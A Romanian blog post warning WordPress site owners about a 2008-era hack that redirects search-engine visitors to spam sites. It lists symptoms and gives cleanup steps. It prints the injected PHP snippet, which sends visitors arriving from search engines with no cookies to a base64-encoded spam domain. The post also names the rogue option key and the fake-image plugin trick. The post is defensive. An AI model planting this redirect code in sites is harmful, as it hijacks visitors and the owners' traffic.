Umblă vorba prin târg cum că ar fi un exploit pentru Wordpress, exploit care ar merge inclusiv la ultima versiune 2.5.1. care plantează şi rulează coduri maliţioase in funcţiile Wordpress şi în baza de date pentru care
redirectează vizitatorii şi hiturile din Google sau alte motoare de căutare către site-uri de spam. Alte hackuri
redirectează toţi vizitatorii exceptând pe cei ce au cookie pentru site-ul respectiv.

Simptome: A se nota că aceste simptome nu se întâmplă toate deodată, ele putând rula de sine stătător.

- Hituri din motoare de căutare precum Google, Zahoo, AOL, MSN, Live către site-ul dumneavoastră vor fi redirectate către site-uri hackerilor gen your-needs.info, golden-info.net, keymachine.de, seogoogle.us ( lista este mică şi sigur creşte rapid ). Vizitatorii ajung la pagina hackerului prin cuvintele cheie folosite în căutari şi într-un mod similar redirectului 301.
- Dând un click către blog din RSS Feed Reader cum este Google Reader pot fi redirectate către site-ul hackerului deasemenea.
- Un vizitator fără cont pe blog sau nelogat ( nu este detectat cookie de codul maliţios ) va fi deasemenea
redirectat către site-uri de spam.
- Doar vizitele din motoarele de căutare sunt redirectate, iar prin acest truc se descoperă mai greu problema.
- Scăderi masive în numărul vizitatorilor, în special în site-urile în care Google trimite peste 70% din
vizitatori, chiar dacă pe moment rankingul în Google rămâne neschimbat.
- Scăderi masive de venit generat prin Google AdSense sau alt fel de reclame PPC.
- Următorul cod codat base64 poate apărea în wp-blog-header.php:

<?php \
$seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

- O poză care de fapt conţine cod maliţios apare prin directorul wp-contents/uploads. De exemplu
wp-contents/uploads/2008/06/06/qwerty.jpg sau chiar în folderul temei wp-contents/themes/classic/images/qwerty.jpg. Numele pozei se pare că este de tipul xxxxx_old.jpeg.
- S-a introdus în baza de date un cod ( în wp_options ) pentru a activa o imagine ( cod PHP maliţios de fapt ).
Codul rss_f541b3abd05e7962fcab37737f40fad8 apare de cele mai multe ori, dar rss_xxxxxxxxxxxx este formatul pe care îl adoptă.
- Orice tema de Wordpress activată şi folosită poate fi şi ea infectată prin injectarea unui cod de redirect în
header.php sau index.php.

Iată un fix pentru aceste probleme pentru a vă primi înapoi vizitatorii şi traficul şi pentru a evita penalizarea
Google pentru redirectări către site-uri de spam.

1. Faceţi un backup la baza de date.
2. Folosiţi phpMyadmin pentru a lucra puţin în baza de date. Mergeţi la tabelul wp_options şi editaţi linia
denumită active_plugins. Acest rând ne arată toate pluginurile active. Vedeţi dacă aveţi activ vreun plugin cu nume terminându-se în extensie de poză ( gif, jpg, png, jpeg ). Notaţi calea către fişier.
3. Folosind sFTP sau SSH ( pentru securitate nu folosiţi FTP sau Telnet ) şi ştergeţi fişierul.
4. Mergeţi în administrarea Wordpress, panoul Plugins, activaţi sau dezactivaţi orice plugin doriţi pentru a şterge codul maliţios din rândul active_plugins.
5. Înapoi la phpMyAdmin, în tabelul wp_options, găsiţi rândul care conţine următoarea linie ca option_name:
rss_f541b3abd05e7962fcab37737f40fad8
Ştergeţi rândul.

6. Mergeţi la tabela wp_users. Dacă vedeţi un user fără nume ( valoare nulă în câmpul user_nicename ) creat la 00:00:00 0000-00-00, notaţi ID-ul acestui user ( câmpul ID ) după care ştergeţi-l.
7. In tabela wp_usermeta localizaţi rândurile în care user_id se potriveşte cu ID-ul userului tocmai şters. Ştergeţi aceste rânduri.
8. Căutaţi în folderul temei folosite de dumneavoastră în fişierele header.php şi index.php pentru orice cod suspicios. Acesta arată astfel:

if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

Dacă găsiţi aşa ceva, ştergeţi codul. A se nota că acest cod poate fi pe mai multe linii şi poate însemna si câteva rânduri întregi de litere care de fapt este acelaşi lucru codat base64.

9. Dacă cumva nu există, creaţi un fişier gol index.html in directorul wp-contents/plugins.
10. Uploadaţi şi scrieţi peste fişierele deja existente, fişierele originale de Wordpress. Dacă upgradaţi, citiţi ghidul cu atenţie.
11. Schimbaţi-vă parola,
12. Dacă aveţi mai mulţi utilizatori, schimbaţi-le parola sau cereţi-le acest lucru.

Revin şi cu alte detalii.